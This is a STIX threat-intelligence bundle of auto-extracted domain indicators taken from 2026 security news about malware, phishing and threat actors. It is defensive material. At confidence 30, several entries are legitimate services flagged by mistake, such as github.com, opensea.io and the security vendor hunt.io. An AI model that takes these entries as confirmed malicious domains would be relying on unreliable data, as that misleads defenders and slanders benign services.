{"type":"bundle","id":"bundle--9185c598-1b76-4dd9-a92a-7a6fb7c74664","objects":[{"type":"identity","spec_version":"2.1","id":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","created":"2026-09-16T07:41:30.509Z","modified":"2026-09-16T07:41:30.509Z","name":"ZeroHour","identity_class":"system","description":"Indicators auto-extracted from public security reporting. Verify before use."},{"type":"indicator","spec_version":"2.1","id":"indicator--2fda463d-a318-41b2-bc64-60ae3a3a04e5","created":"2026-09-16T06:57:34.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: api.telegram.org","description":"Seen in \"Hackers Disguise CHOSEN BRICK Malware as AI Apps, Antivirus Software and MRI Results\" (GBHackers). Context: orjShare. Defenders should investigate unexpected access to api[.]telegram[.]org , backblazeb2[.]com , vultrobjects[.]com , storjshare[.","pattern":"[domain-name:value = 'api.telegram.org']","pattern_type":"stix","valid_from":"2026-09-16T06:57:34.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/chosen-brick-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3879cb54-37cf-4609-8dfc-57ec5bf7b310","created":"2026-09-16T06:57:34.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: backblazeb2.com","description":"Seen in \"Hackers Disguise CHOSEN BRICK Malware as AI Apps, Antivirus Software and MRI Results\" (GBHackers). Context: uld investigate unexpected access to api[.]telegram[.]org , backblazeb2[.]com , vultrobjects[.]com , storjshare[.]io , iproyal[.]com an","pattern":"[domain-name:value = 'backblazeb2.com']","pattern_type":"stix","valid_from":"2026-09-16T06:57:34.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/chosen-brick-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2c5bf1e9-ef41-41ad-8c2b-d8216d6f4907","created":"2026-09-16T06:57:34.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: iproyal.com","description":"Seen in \"Hackers Disguise CHOSEN BRICK Malware as AI Apps, Antivirus Software and MRI Results\" (GBHackers). Context: backblazeb2[.]com , vultrobjects[.]com , storjshare[.]io , iproyal[.]com and lightningproxies[.]net , particularly where such conn","pattern":"[domain-name:value = 'iproyal.com']","pattern_type":"stix","valid_from":"2026-09-16T06:57:34.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/chosen-brick-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d91ab60b-893b-4151-a317-5e6a955aa973","created":"2026-09-16T06:57:34.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: lightningproxies.net","description":"Seen in \"Hackers Disguise CHOSEN BRICK Malware as AI Apps, Antivirus Software and MRI Results\" (GBHackers). Context: , vultrobjects[.]com , storjshare[.]io , iproyal[.]com and lightningproxies[.]net , particularly where such connections do not align with n","pattern":"[domain-name:value = 'lightningproxies.net']","pattern_type":"stix","valid_from":"2026-09-16T06:57:34.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/chosen-brick-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a1ea367c-db79-402c-99af-d95c6a273f23","created":"2026-09-16T06:57:34.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: storjshare.io","description":"Seen in \"Hackers Disguise CHOSEN BRICK Malware as AI Apps, Antivirus Software and MRI Results\" (GBHackers). Context: .]telegram[.]org , backblazeb2[.]com , vultrobjects[.]com , storjshare[.]io , iproyal[.]com and lightningproxies[.]net , particularly","pattern":"[domain-name:value = 'storjshare.io']","pattern_type":"stix","valid_from":"2026-09-16T06:57:34.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/chosen-brick-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--29b991b4-0893-4b1d-89ad-ef325eb6bf4f","created":"2026-09-16T06:57:34.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: vultrobjects.com","description":"Seen in \"Hackers Disguise CHOSEN BRICK Malware as AI Apps, Antivirus Software and MRI Results\" (GBHackers). Context: pected access to api[.]telegram[.]org , backblazeb2[.]com , vultrobjects[.]com , storjshare[.]io , iproyal[.]com and lightningproxies[.]","pattern":"[domain-name:value = 'vultrobjects.com']","pattern_type":"stix","valid_from":"2026-09-16T06:57:34.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/chosen-brick-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4bb59c7e-b064-4d4a-be18-cf92ce28a364","created":"2026-09-16T05:18:06.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: github.com","description":"Seen in \"Active Exploitation Attempts Target WSO2 API Manager JWT Bypass With Forged Admin Tokens\" (The Hacker News). Context: ilable in the following pull requests for community users - github[.]com/wso2/carbon-apimgt/pull/13752 github[.]com/wso2/product-a","pattern":"[domain-name:value = 'github.com']","pattern_type":"stix","valid_from":"2026-09-16T05:18:06.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/active-exploitation-attempts-target.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f31624dd-b9be-4b1e-ad2b-8cbb5d59a057","created":"2026-09-15T19:38:58.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: vip311.cc","description":"Seen in \"Low-quality casino sites conceal highly dangerous threat actors\" (The Register · Security). Context: e. Screenshots of three casino sites identified by Infoblox—vip311[.]cc, zzyud[.]com and zenplay77-x[.]space—with vip311[.]cc ass","pattern":"[domain-name:value = 'vip311.cc']","pattern_type":"stix","valid_from":"2026-09-15T19:38:58.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/security/2026/09/15/low-quality-casino-sites-conceal-highly-dangerous-threat-actors/5296652"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8ce5df63-c66c-43f9-ade4-3f7b72eeaead","created":"2026-09-15T19:38:58.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: zenplay77-x.space","description":"Seen in \"Low-quality casino sites conceal highly dangerous threat actors\" (The Register · Security). Context: o sites identified by Infoblox—vip311[.]cc, zzyud[.]com and zenplay77-x[.]space—with vip311[.]cc associated with PeckBirdy. The problem i","pattern":"[domain-name:value = 'zenplay77-x.space']","pattern_type":"stix","valid_from":"2026-09-15T19:38:58.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/security/2026/09/15/low-quality-casino-sites-conceal-highly-dangerous-threat-actors/5296652"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--96993ec9-627a-4d75-8f59-c78a4c947f7a","created":"2026-09-15T19:38:58.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: zzyud.com","description":"Seen in \"Low-quality casino sites conceal highly dangerous threat actors\" (The Register · Security). Context: s of three casino sites identified by Infoblox—vip311[.]cc, zzyud[.]com and zenplay77-x[.]space—with vip311[.]cc associated with","pattern":"[domain-name:value = 'zzyud.com']","pattern_type":"stix","valid_from":"2026-09-15T19:38:58.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/security/2026/09/15/low-quality-casino-sites-conceal-highly-dangerous-threat-actors/5296652"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--328e5d18-d6fb-4ac3-af85-00afd9d0ea55","created":"2026-09-15T18:54:14.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: luizestrelhashapr.online","description":"Seen in \"KREMLIN Banking Malware Hijacks Chrome and Edge to Steal Credentials and Session Tokens\" (The Hacker News). Context: filtrating browser data for each profile to its C2 server (\"luizestrelhashapr[.]online:443\") but not before requesting extensive access to brows","pattern":"[domain-name:value = 'luizestrelhashapr.online']","pattern_type":"stix","valid_from":"2026-09-15T18:54:14.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/kremlin-banking-malware-hijacks-chrome.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0b700112-62a7-48e0-965c-851f1ab0d0df","created":"2026-09-15T18:54:14.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: volmira.site","description":"Seen in \"KREMLIN Banking Malware Hijacks Chrome and Edge to Steal Credentials and Session Tokens\" (The Hacker News). Context: to the same Ethereum smart contract to fetch two domains – volmira[.]site and zaviro[.]online – and queries the former to obtain th","pattern":"[domain-name:value = 'volmira.site']","pattern_type":"stix","valid_from":"2026-09-15T18:54:14.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/kremlin-banking-malware-hijacks-chrome.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--150127e5-f2b3-496b-b3ff-f359e017212a","created":"2026-09-15T18:54:14.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: zaviro.online","description":"Seen in \"KREMLIN Banking Malware Hijacks Chrome and Edge to Steal Credentials and Session Tokens\" (The Hacker News). Context: um smart contract to fetch two domains – volmira[.]site and zaviro[.]online – and queries the former to obtain the browser extension","pattern":"[domain-name:value = 'zaviro.online']","pattern_type":"stix","valid_from":"2026-09-15T18:54:14.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/kremlin-banking-malware-hijacks-chrome.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d96f5b69-a904-4fb1-9ea3-506be3086dc4","created":"2026-09-15T15:23:19.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: c2iznja.com","description":"Seen in \"BambooToken Malware Uses MQTT to Control Windows and Linux Systems\" (The Hacker News). Context: on the machine and exfiltrate them to the C2 server (\"api80.c2iznja[.]com\"). \"The domains used Cloudflare as a proxy for their infr","pattern":"[domain-name:value = 'c2iznja.com']","pattern_type":"stix","valid_from":"2026-09-15T15:23:19.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/bambootoken-malware-uses-mqtt-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8c7431f4-8383-4bb9-af93-8d64261d5890","created":"2026-09-15T15:23:19.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: chat5188.tk","description":"Seen in \"BambooToken Malware Uses MQTT to Control Windows and Linux Systems\" (The Hacker News). Context: gather system details and transmit them to the C2 server (\"chat5188[.]tk\"). In response, the server issues commands to load a plug","pattern":"[domain-name:value = 'chat5188.tk']","pattern_type":"stix","valid_from":"2026-09-15T15:23:19.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/bambootoken-malware-uses-mqtt-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7bd8fd0c-50de-47c2-af5e-d8badcc2c989","created":"2026-09-15T13:33:58.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: hunt.io","description":"Seen in \"Thai Broadband Provider Hacked via Fortinet Vulnerability\" (SecurityWeek). Context: mand-and-control (C&C) platform for remote administration,” Hunt.io says. Next, the attackers used various scripts for host dis","pattern":"[domain-name:value = 'hunt.io']","pattern_type":"stix","valid_from":"2026-09-15T13:33:58.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"SecurityWeek","url":"https://www.securityweek.com/thai-broadband-provider-hacked-via-fortinet-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--37370253-c0fc-4fa0-826a-64b4dfca566e","created":"2026-09-15T13:04:34.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: 31-59-175-195.syd.nbn.aussiebb.net","description":"Seen in \"Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters\" (GBHackers). Context: gets through redirect and tracking infrastructure including 31-59-175-195[.]syd[.]nbn[.]aussiebb[.]net , loadswage[.]com , and eightindigostove[.]com . Th","pattern":"[domain-name:value = '31-59-175-195.syd.nbn.aussiebb.net']","pattern_type":"stix","valid_from":"2026-09-15T13:04:34.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/trusted-email-abuse/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2eeb35b9-0fa6-41d7-8772-bb93b6522614","created":"2026-09-15T13:04:34.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: eightindigostove.com","description":"Seen in \"Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters\" (GBHackers). Context: 75-195[.]syd[.]nbn[.]aussiebb[.]net , loadswage[.]com , and eightindigostove[.]com . The final operation was assessed as fake renewal scarew","pattern":"[domain-name:value = 'eightindigostove.com']","pattern_type":"stix","valid_from":"2026-09-15T13:04:34.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/trusted-email-abuse/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--83ba1507-f37b-44e4-a691-922db1a7ad13","created":"2026-09-15T13:04:34.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: loadswage.com","description":"Seen in \"Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters\" (GBHackers). Context: ture including 31-59-175-195[.]syd[.]nbn[.]aussiebb[.]net , loadswage[.]com , and eightindigostove[.]com . The final operation was as","pattern":"[domain-name:value = 'loadswage.com']","pattern_type":"stix","valid_from":"2026-09-15T13:04:34.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/trusted-email-abuse/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a9c1bad0-4ee4-432e-ad98-f77fe20aa7e5","created":"2026-09-15T13:04:34.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: moolaah.com","description":"Seen in \"Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters\" (GBHackers). Context: d through Amazon Simple Email Service from the DKIM-aligned moolaah[.]com domain and urged recipients to open a supposed Mahnschrei","pattern":"[domain-name:value = 'moolaah.com']","pattern_type":"stix","valid_from":"2026-09-15T13:04:34.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/trusted-email-abuse/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--97f13c6a-b038-4e1f-b1f4-15fb3253e57c","created":"2026-09-15T13:04:34.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: opensea.io","description":"Seen in \"Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters\" (GBHackers). Context: itting a concealed POST request and eventually resolving to opensea[.]io during live analysis. Virus Bulletin’s Q3 2026 VBSpam tes","pattern":"[domain-name:value = 'opensea.io']","pattern_type":"stix","valid_from":"2026-09-15T13:04:34.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/trusted-email-abuse/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a1df6ac5-429a-4fda-a726-995badc67697","created":"2026-09-15T13:04:34.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: web5-4s4c-online-garantibbva.vibtee.com","description":"Seen in \"Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters\" (GBHackers). Context: s IPv4 address 103[.]193[.]179[.]223 and redirected through web5-4s4c-online-garantibbva[.]vibtee[.]com/ro/ before ultimately reaching Google during verificati","pattern":"[domain-name:value = 'web5-4s4c-online-garantibbva.vibtee.com']","pattern_type":"stix","valid_from":"2026-09-15T13:04:34.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/trusted-email-abuse/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1a566b57-4225-41a0-907b-f800ef8a6389","created":"2026-09-15T13:04:34.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: website-2df62808.mvplineup.com","description":"Seen in \"Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters\" (GBHackers). Context: ent reminder. No file was attached. Its embedded URL led to website-2df62808[.]mvplineup[.]com/audacity/underside , a first-stage page containing deco","pattern":"[domain-name:value = 'website-2df62808.mvplineup.com']","pattern_type":"stix","valid_from":"2026-09-15T13:04:34.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/trusted-email-abuse/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--43718f4e-0b15-47fc-9b21-973d144c7fec","created":"2026-09-15T13:04:34.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: xmasbrick.com","description":"Seen in \"Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters\" (GBHackers). Context: : Virus Bulletin). Sent from the DKIM-aligned but unrelated xmasbrick[.]com domain, the message embedded an IPv6-mapped address: hxxp","pattern":"[domain-name:value = 'xmasbrick.com']","pattern_type":"stix","valid_from":"2026-09-15T13:04:34.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/trusted-email-abuse/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--120af0a2-40e4-4d02-9365-f45ea01c7218","created":"2026-09-15T12:02:50.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: 31-59-175-195.syd.nbn.aussiebb.net","description":"Seen in \"New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools\" (Cyber Security News). Context: of compromise (IoCs):- Type Indicator Description Hostname 31-59-175-195[.]syd[.]nbn[.]aussiebb[.]net Redirect infrastructure used in the antivirus renew","pattern":"[domain-name:value = '31-59-175-195.syd.nbn.aussiebb.net']","pattern_type":"stix","valid_from":"2026-09-15T12:02:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-phishing-attacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a162c020-4058-416d-8eb6-063f05772ea5","created":"2026-09-15T12:02:50.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: eightindigostove.com","description":"Seen in \"New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools\" (Cyber Security News). Context: ssociated with the antivirus renewal phishing sample Domain eightindigostove[.]com Domain hosting the unsubscribe path in the antivirus rene","pattern":"[domain-name:value = 'eightindigostove.com']","pattern_type":"stix","valid_from":"2026-09-15T12:02:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-phishing-attacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f246a7b0-cff0-41d8-b7b0-acf60ef8bde8","created":"2026-09-15T12:02:50.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: loadswage.com","description":"Seen in \"New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools\" (Cyber Security News). Context: sed in the antivirus renewal scareware phishing flow Domain loadswage[.]com Redirect infrastructure associated with the antivirus ren","pattern":"[domain-name:value = 'loadswage.com']","pattern_type":"stix","valid_from":"2026-09-15T12:02:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-phishing-attacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1871bdab-dd0a-44db-8f09-512a4657a275","created":"2026-09-15T12:02:50.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: moolaah.com","description":"Seen in \"New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools\" (Cyber Security News). Context: path in the antivirus renewal phishing sample Sender domain moolaah[.]com DKIM-aligned sender domain used for the cloaked overdue-p","pattern":"[domain-name:value = 'moolaah.com']","pattern_type":"stix","valid_from":"2026-09-15T12:02:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-phishing-attacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--67225c81-ca02-43ec-9e4f-86d24abd40ce","created":"2026-09-15T12:02:50.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: opensea.io","description":"Seen in \"New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools\" (Cyber Security News). Context: ing page used in the invoice phishing redirect chain Domain opensea[.]io Final destination reached after the cloaking and browser-","pattern":"[domain-name:value = 'opensea.io']","pattern_type":"stix","valid_from":"2026-09-15T12:02:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-phishing-attacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7b9c288f-c745-4041-9bc2-58935a62698f","created":"2026-09-15T12:02:50.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: web5-4s4c-online-garantibbva.vibtee.com","description":"Seen in \"New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools\" (Cyber Security News). Context: Pv4 address represented by the IPv6-mapped URL notation URL web5-4s4c-online-garantibbva[.]vibtee[.]com/ro/ Redirect destination in the Romanian PSD2 banking p","pattern":"[domain-name:value = 'web5-4s4c-online-garantibbva.vibtee.com']","pattern_type":"stix","valid_from":"2026-09-15T12:02:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-phishing-attacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ccd849cd-aa5b-429b-94c9-5ad1725bbfbf","created":"2026-09-15T12:02:50.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: website-2df62808.mvplineup.com","description":"Seen in \"New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools\" (Cyber Security News). Context: omain used for the cloaked overdue-payment invoice lure URL website-2df62808[.]mvplineup[.]com/audacity/underside First-stage cloaking page used in th","pattern":"[domain-name:value = 'website-2df62808.mvplineup.com']","pattern_type":"stix","valid_from":"2026-09-15T12:02:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-phishing-attacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--21ddccc4-53ec-4af9-8c23-222c99658246","created":"2026-09-15T12:02:50.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: xmasbrick.com","description":"Seen in \"New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools\" (Cyber Security News). Context: the cloaking and browser-fingerprinting stage Sender domain xmasbrick[.]com DKIM-aligned but unrelated sender domain used in the Roma","pattern":"[domain-name:value = 'xmasbrick.com']","pattern_type":"stix","valid_from":"2026-09-15T12:02:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-phishing-attacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5231a94f-aa0c-481d-beed-a87292a816af","created":"2026-09-15T12:00:00.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: api.telegram.org","description":"Seen in \"Iranian cyber targeting of dissidents, activists and journalists\" (NCSC UK). Context: ing in logging unexpectedly should be investigated further: api[.]telegram[.]org backblazeb2[.]com vultrobjects[.]com storjshare[.]io ip","pattern":"[domain-name:value = 'api.telegram.org']","pattern_type":"stix","valid_from":"2026-09-15T12:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"NCSC UK","url":"https://www.ncsc.gov.uk/news/iranian-cyber-targeting-of-dissidents-activists-and-journalists"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--64974380-4c3b-431e-8bf9-dbc7b513575f","created":"2026-09-15T12:00:00.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: backblazeb2.com","description":"Seen in \"Iranian cyber targeting of dissidents, activists and journalists\" (NCSC UK). Context: ctedly should be investigated further: api[.]telegram[.]org backblazeb2[.]com vultrobjects[.]com storjshare[.]io iproyal[.]com lightnin","pattern":"[domain-name:value = 'backblazeb2.com']","pattern_type":"stix","valid_from":"2026-09-15T12:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"NCSC UK","url":"https://www.ncsc.gov.uk/news/iranian-cyber-targeting-of-dissidents-activists-and-journalists"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b3442ee8-94a1-47da-9021-cafb291f8e7c","created":"2026-09-15T12:00:00.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: iproyal.com","description":"Seen in \"Iranian cyber targeting of dissidents, activists and journalists\" (NCSC UK). Context: [.]org backblazeb2[.]com vultrobjects[.]com storjshare[.]io iproyal[.]com lightningproxies[.]net Mitigations The best defence is fo","pattern":"[domain-name:value = 'iproyal.com']","pattern_type":"stix","valid_from":"2026-09-15T12:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"NCSC UK","url":"https://www.ncsc.gov.uk/news/iranian-cyber-targeting-of-dissidents-activists-and-journalists"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--281a96a1-8880-4dce-9713-d8057b3947bd","created":"2026-09-15T12:00:00.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: lightningproxies.net","description":"Seen in \"Iranian cyber targeting of dissidents, activists and journalists\" (NCSC UK). Context: zeb2[.]com vultrobjects[.]com storjshare[.]io iproyal[.]com lightningproxies[.]net Mitigations The best defence is for the user/victim to be","pattern":"[domain-name:value = 'lightningproxies.net']","pattern_type":"stix","valid_from":"2026-09-15T12:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"NCSC UK","url":"https://www.ncsc.gov.uk/news/iranian-cyber-targeting-of-dissidents-activists-and-journalists"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8f043dd3-72af-43ea-8bde-7abc5a45fd36","created":"2026-09-15T12:00:00.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: storjshare.io","description":"Seen in \"Iranian cyber targeting of dissidents, activists and journalists\" (NCSC UK). 